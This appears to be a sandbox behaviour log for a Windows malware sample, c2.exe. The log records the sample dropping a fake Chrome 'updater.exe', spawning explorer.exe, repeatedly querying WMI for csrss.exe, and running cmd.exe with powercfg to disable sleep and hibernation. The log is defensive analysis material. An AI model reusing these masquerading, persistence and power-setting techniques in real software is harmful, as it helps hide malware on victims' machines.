                Source: C:\Users\user\Desktop\c2.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7948:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7704:120:WilError_03
                Source: C:\Users\user\Desktop\c2.exeFile created: C:\Users\user\AppData\Local\Temp\wjwbvsfqhrdh.xmlJump to behavior
                Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: c2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Users\user\Desktop\c2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: c2.exeReversingLabs: Detection: 42%
                Source: C:\Users\user\Desktop\c2.exeFile read: C:\Users\user\Desktop\c2.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\c2.exe "C:\Users\user\Desktop\c2.exe"
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                Source: unknownProcess created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: unknownProcess created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                Source: C:\Users\user\Desktop\c2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
                Source: C:\Users\user\Desktop\c2.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\c2.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\c2.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
                Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exeJump to behavior
                Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
                Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
